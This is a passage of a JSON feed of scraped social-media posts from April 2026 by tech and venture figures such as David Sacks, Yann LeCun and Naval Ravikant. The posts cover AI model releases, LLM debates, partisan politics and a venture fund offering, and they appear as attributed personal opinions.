\n\nHere are some of his insights from his visit to my Lab.\n\n@FutureJurvetson @Stanford @DigEconLab", + "url": "https://nitter.net/erikbryn/status/2047874760542200042#m", + "published_at": "2026-04-25T03:06:05+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://nitter.net/DavidSacks/status/2047871382923469241#m", + "published_at": "2026-04-25T02:52:39+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://nitter.net/DavidSacks/status/2047867592790946189#m", + "published_at": "2026-04-25T02:37:36+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "WTF are these lunatics up to…", + "url": "https://nitter.net/Jason/status/2047858837319774540#m", + "published_at": "2026-04-25T02:02:48+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "WTF are these kids up to?!", + "url": "https://nitter.net/Jason/status/2047857845387845816#m", + "published_at": "2026-04-25T01:58:52+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://nitter.net/TheChiefNerd/status/2047842000632713369#m", + "published_at": "2026-04-25T00:55:54+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://nitter.net/sama/status/2047823357635354814#m", + "published_at": "2026-04-24T23:41:49+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://nitter.net/jayplemons/status/2047823154655932696#m", + "published_at": "2026-04-24T23:41:01+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional economic indicators. https://digitaleconomy.stanford.edu/publication/what-is-generative-ai-worth/", + "url": "https://nitter.net/RonnieChatterji/status/2047821064437424288#m", + "published_at": "2026-04-24T23:32:43+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Planning an event usually means juggling dozens of vendors, scattered payments, and zero visibility. It's a logistical mess.\n\nLAMAT is fixing the chaos. It's a marketplace that lets organizations discover, book, and manage every event service on a single platform.", + "url": "https://nitter.net/LAUNCH/status/2047813100091449428#m", + "published_at": "2026-04-24T23:01:04+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://nitter.net/theallinpod/status/2047808256047821141#m", + "published_at": "2026-04-24T22:41:49+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://nitter.net/HarryStebbings/status/2047792195868967172#m", + "published_at": "2026-04-24T21:38:00+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 and GPT-5.5 Pro are now available in the API!", + "url": "https://nitter.net/sama/status/2047787124846653895#m", + "published_at": "2026-04-24T21:17:51+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss:\n\n🇦🇺 0\n🇨🇦 0\n🇩🇰 0\n🇫🇮 0\n🇫🇷 0\n🇩🇪 0\n🇮🇸 0\n🇮🇪 0\n🇮🇹 0\n🇯🇵 0\n🇳🇱 0\n🇳🇴 0\n🇵🇹 0\n🇪🇸 0\n🇸🇪 0\n🇬🇧 0\n🇺🇸 530,000\n\nThere’s a lesson there.", + "url": "https://nitter.net/Strandjunker/status/2047780272297382384#m", + "published_at": "2026-04-24T20:50:37+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT.\n\nIn an attempt to influence American foreign policy, he proposed a Trump-branded golf course, cut Jared Kushner & Ivanka Trump into a multibillion-dollar real estate deal for a resort in Albania, and had someone physically deliver a stone engraved with the Trump family crest to a Republican Member of Congress with instructions to take it to the White House to get the President's attention.\n\nTrump threw his weight behind repealing the sanctions. They were lifted. The contracts are moving, and the Trump family’s deals are expanding.", + "url": "https://nitter.net/unusual_whales/status/2047761493274571036#m", + "published_at": "2026-04-24T19:36:00+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton).\n\nWe talked about ConvNeXt and whether architecture still matters; dataset bias and what \"good data\" actually looks like; ImageBind and why vision is the natural bridge across modalities; CLIP's blind spots; memory as the real bottleneck behind the agent hype; whether LLMs have world models; and Transformers Without Normalization.\n\nFor years, the vision community debated what actually matters: architecture, inductive bias, self-attention vs convolution. After a lot of back-and-forth, we ended up in a funny place: ViT and ConvNet give roughly the same performance once you tune the details.\n\nWhat I find interesting is that once you reach a certain performance level, it becomes much easier to swap and tweak components without really changing the outcome.\n\nTalking to Zhuang on this episode, I kept wondering whether the same is now true for LLMs. If we wil spent serious time on an alternative architecture today, would you actually get a meaningfully different model, or just land on the same Pareto curve with extra steps?\n\nI'm starting to suspect it's the latter. Architecture matters less than we think. Data, compute, and a handful of pillars do most of the work.", + "url": "https://nitter.net/ziv_ravid/status/2047760455679246500#m", + "published_at": "2026-04-24T19:31:52+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Baby’s first con", + "url": "https://nitter.net/Aaron_Margolin/status/2047748882952778044#m", + "published_at": "2026-04-24T18:45:53+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://nitter.net/awnihannun/status/2047748613976264835#m", + "published_at": "2026-04-24T18:44:49+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The web is disappearing 🕳️\n\nAccording to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible.\n\nBut that’s not the whole story.\n\nIn a new study published in Internet Archive's book, VANISHING CULTURE, data scientists working with the Wayback Machine have found:\n16% have been restored through the Wayback Machine.\n56% are preserved before they disappear.\n\nPreservation is the remedy for cultural loss.\n\n📚 Read VANISHING CULTURE free from the Internet Archive \n\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new \n\n#VanishingCulture #DigitalMemory #InternetArchive #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2047733594064408894#m", + "published_at": "2026-04-24T17:45:08+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!", + "url": "https://nitter.net/tokidoki/status/2047723587528782152#m", + "published_at": "2026-04-24T17:05:22+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://nitter.net/DavidSacks/status/2047717649849659586#m", + "published_at": "2026-04-24T16:41:47+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Good morning! Rise and shine, gamers!", + "url": "https://nitter.net/shopculturefly/status/2047711254379393160#m", + "published_at": "2026-04-24T16:16:22+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://nitter.net/SquawkCNBC/status/2047703023690924289#m", + "published_at": "2026-04-24T15:43:39+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。\n\n他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。\n\n这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。\n\n最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能体。\n\n因为它们本质上只是下一个token预测机,只能在文字和像素的空间里做统计关联,从来没有真正理解过这个世界的因果。\n它们不会预测行动的后果,不会真正的规划,更没有常识。\n\n当然,我不是说LLM没用,短期来看,scaling LLM+微调+工具调用,已经能吃掉80%的白领工作,硅谷所有人往这里冲,也算是完全理性,毕竟钱和机会就在这里。\n\n但长期来看,这是一条有天花板的路。因为你永远不可能在文字地图上,开出一辆真正的车。\n机器人、具身智能、长期自主代理、真正的科学发现,这些坎,纯LLM永远跨不过去。\n\nLeCun说,真正的智能必须有世界模型。就是说给定当前的状态和你要做的动作,你要能准确预测下一秒世界会变成什么样。不是简单的像素级的生成,还需要对物理规律和因果关系的抽象建模。\n\n最近Figure、特斯拉、谷歌的机器人项目,其实都在偷偷补这一课,只是没人愿意公开说,LLM不是万能地基。\n\n我理解未来真正的智能,一定是混合栈,LLM负责语言交互和符号推理,世界模型负责因果预测和长期规划,执行层负责把计划变成动作。\n\nLeCun从来没说过要抛弃LLM,他只是反对把LLM当成一切的答案。\n\n硅谷现在最可怕的问题不是卷,是所有人都在同一条赛道上卷得太狠,以至于忘了终点其实根本不在这条赛道上。\n\n世界模型这道坎,迟早要跨。\n而谁先跨过去,谁就是下一个时代的赢家。\n#YannLeCun #世界模型 #AGI #大模型 #具身智能", + "url": "https://nitter.net/AYi_AInotes/status/2047697898989572176#m", + "published_at": "2026-04-24T15:23:18+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://nitter.net/RapidResponse47/status/2047694657107165519#m", + "published_at": "2026-04-24T15:10:25+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://nitter.net/HarryStebbings/status/2047693043080261672#m", + "published_at": "2026-04-24T15:04:00+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "🫶", + "url": "https://nitter.net/sama/status/2047683787828703289#m", + "published_at": "2026-04-24T14:27:13+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://nitter.net/ihtesham2005/status/2047680485208531152#m", + "published_at": "2026-04-24T14:14:06+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://nitter.net/Discoplomacy/status/2047676640059154653#m", + "published_at": "2026-04-24T13:58:49+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": "https://nitter.net/DavidSacks/status/2047672359377588241#m", + "published_at": "2026-04-24T13:41:49+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://nitter.net/DavidSacks/status/2047671706660073767#m", + "published_at": "2026-04-24T13:39:13+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://nitter.net/JeffDean/status/2047665074471387456#m", + "published_at": "2026-04-24T13:12:52+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://nitter.net/alexbass/status/2047645157080658335#m", + "published_at": "2026-04-24T11:53:43+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "Im genuinely this Close to killing myself rn & this Shit happens like Okay", + "url": "https://nitter.net/satoshibun/status/2047641832624893993#m", + "published_at": "2026-04-24T11:40:30+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them.\n2. A robot-rich future can't be built with AIs that don't understand the physical world and don't anticipate the consequences of their actions. And LLMs really don't.\n3. The future in the cartoon looks pretty dystopian TBH, but even a non-dystopian version will require world models and zero-shot planning abilities.\n4. I rarely wear a suit and absolutely never wear a tie.\n5. I would never ever place a coffee mug on top of a piece equipment.\n6. I hope I'll look this young in 2032.", + "url": "https://nitter.net/ylecun/status/2047636569767419951#m", + "published_at": "2026-04-24T11:19:36+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing.\n\nI just don't get it", + "url": "https://nitter.net/DaCapTainXD/status/2047633324676440561#m", + "published_at": "2026-04-24T11:06:42+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques.\n\nWith @ELLISUnitMadrid.\n\n📍 Madrid 🇪🇸 \n📅 June 8-19th\n⏰ Apply by June 3rd\n🔗 https://cig.fi.upm.es/mlas/", + "url": "https://nitter.net/ELLISforEurope/status/2047624126047670758#m", + "published_at": "2026-04-24T10:30:09+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 😾", + "url": "https://nitter.net/aaa___kanato/status/2047606779677376714#m", + "published_at": "2026-04-24T09:21:13+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️\n⠀⠀⠀⠀⠀⠀⠀『#文字化化』\n⠀「不思議の国のアリス」テーマ\n⠀グラフアート新商品発売決定!\n♠️━━━━━━━━━━━━━♥️\n\n📅5/23~6/5\n📍eeo Store 池袋本店\n🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&utm_medium=social&utm_campaign=20260424_MJBK\n\n商品詳細はURLとツリーをチェック🎩🐰\n\n#Homicipher", + "url": "https://nitter.net/eeo_store/status/2047586383519531500#m", + "published_at": "2026-04-24T08:00:10+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabituellement cohérent, mérite une lecture attentive. Il révèle bien plus qu'une opinion sur l'immigration.\n\n▶️ Commençons par l'évidence que tout le monde remarque : ce texte n'a pas été écrit par Donald Trump.\nTrump écrit en majuscules intempestives, en phrases courtes, avec des digressions abruptes et une syntaxe chaotique. Ce texte est long, structuré, argumenté, avec une progression rhétorique délibérée, une introduction, des exemples, une montée en puissance émotionnelle, une conclusion en appel à l'action. C'est la marque de fabrique de Stephen Miller, architecte de la politique migratoire de Trump depuis dix ans, dont l'organisation America First Legal est précisément celle qui a construit les arguments juridiques soumis à la Cour Suprême. \n\nMiller rédige. Trump signe. C'est une mécanique documentée depuis des années.\n\n▶️ Ce qui rend ce texte particulièrement remarquable, c'est son timing et son objectif.\n\nLe 1er avril, Trump a assisté en personne aux plaidoiries de la Cour Suprême sur le droit du sol, la première fois dans l'histoire américaine qu'un président en exercice assiste à des arguments oraux devant la Cour. \n\nLa majorité des juges, y compris ceux nommés par Trump lui-même, ont exprimé un scepticisme marqué.\n\nCe post fleuve publié dans les jours suivants n'est pas une réflexion spontanée. C'est une tentative d'influencer l'opinion publique, et peut-être les juges eux-mêmes, avant que la décision ne tombe en juin. \n\nVenons-en aux affirmations les plus choquantes du texte, point par point.\n\n▶️ \"Nous sommes le seul pays au monde assez stupide pour autoriser le droit du sol.\" C'est factuellement faux. Une trentaine de pays garantissent la citoyenneté aux enfants nés sur leur territoire, dont le Canada, le Mexique, le Brésil et l'Argentine. \n\n▶️ Trump écrit en substance que les Indiens et les Chinois qu'il qualifie de \"gangsters with laptops\", occupent toutes les places dans la tech californienne, que les Blancs n'ont plus leur chance, et que ce n'est plus leur pays. \n\nLes ingénieurs d'origine indienne et chinoise sont les architectes de l'économie technologique américaine, la même économie dont Trump se félicite en permanence. Google, Microsoft, Adobe, IBM, Palo Alto Networks, Arista Networks : autant de géants américains dirigés par des PDG d'origine indienne. \n\nSelon le rapport Stanford HAI 2026, les États-Unis investissent 285 milliards en IA et 80% des chercheurs en IA américains sont nés à l'étranger. Expulser ou décourager ces populations, c'est amputer l'innovation américaine au bénéfice de la Chine, l'adversaire que Trump prétend combattre.\n\n▶️ L'ACLU (American Civil Liberties Union, organisation fondée en 1920 pour défendre les libertés constitutionnelles américaines) est qualifiée \"d'organisation criminelle, la plus dangereuse de l'histoire des États-Unis,\" plus dangereuse que l'Iran. Trump écrit qu'elle \"a fait plus de dégâts à ce pays que l'Iran n'en a jamais fait\" et appelle à la poursuivre sous une loi antimafia. \n\n▶️ \"Le melting pot est terminé. C'est juste une marmite à cash.\" Le melting pot (le creuset en français), est le mythe fondateur de l'identité américaine depuis deux siècles. Lithuaniens, Roumains, Russes, Polonais, Italiens : Trump les cite lui-même comme exemples de bonnes intégrations. Il oublie de mentionner que ces vagues migratoires européennes ont elles aussi été accueillies avec les mêmes discours : les Irlandais traités de sous-humains, les Italiens lynchés, les Polonais moqués pour leur manque de loyauté. L'histoire se répète. Seule la nationalité des boucs émissaires change.\n\n📕 Dans Le Pantin de la Maison Blanche, j'analyse comment Stephen Miller, idéologue de l'immigration ethno-nationaliste depuis vingt ans, utilise Trump comme amplificateur de sa vision du monde. Ce texte en est la démonstration la plus pure.\n\nL'Amérique a été construite par les enfants de ceux que ce texte veut expulser. Jensen Huang, NVIDIA, l'entreprise qui alimente la révolution IA mondiale, est né à Taïwan. Sundar Pichai, Google, est né en Inde. Satya Nadella, Microsoft, est né en Inde. Chacun d'eux est le produit d'une Amérique qui croyait encore à la vertu de ce fameux meltin pot. Ce texte leur dit que cette Amérique est terminée.\n\n📖 Le Pantin de la Maison Blanche → https://www.amazon.fr/dp/B0GPCCMS68/", + "url": "https://nitter.net/cginisty/status/2047565736382534091#m", + "published_at": "2026-04-24T06:38:08+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://nitter.net/naval/status/2047550896670908809#m", + "published_at": "2026-04-24T05:39:10+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://nitter.net/avlok/status/2047546920747307466#m", + "published_at": "2026-04-24T05:23:22+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://nitter.net/liuliu/status/2047527371486658814#m", + "published_at": "2026-04-24T04:05:41+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://nitter.net/naval/status/2047520212787015748#m", + "published_at": "2026-04-24T03:37:14+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://nitter.net/naval/status/2047519250433421604#m", + "published_at": "2026-04-24T03:33:25+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://nitter.net/naval/status/2047510419565420779#m", + "published_at": "2026-04-24T02:58:19+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://nitter.net/eladgil/status/2047489459378397604#m", + "published_at": "2026-04-24T01:35:02+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an 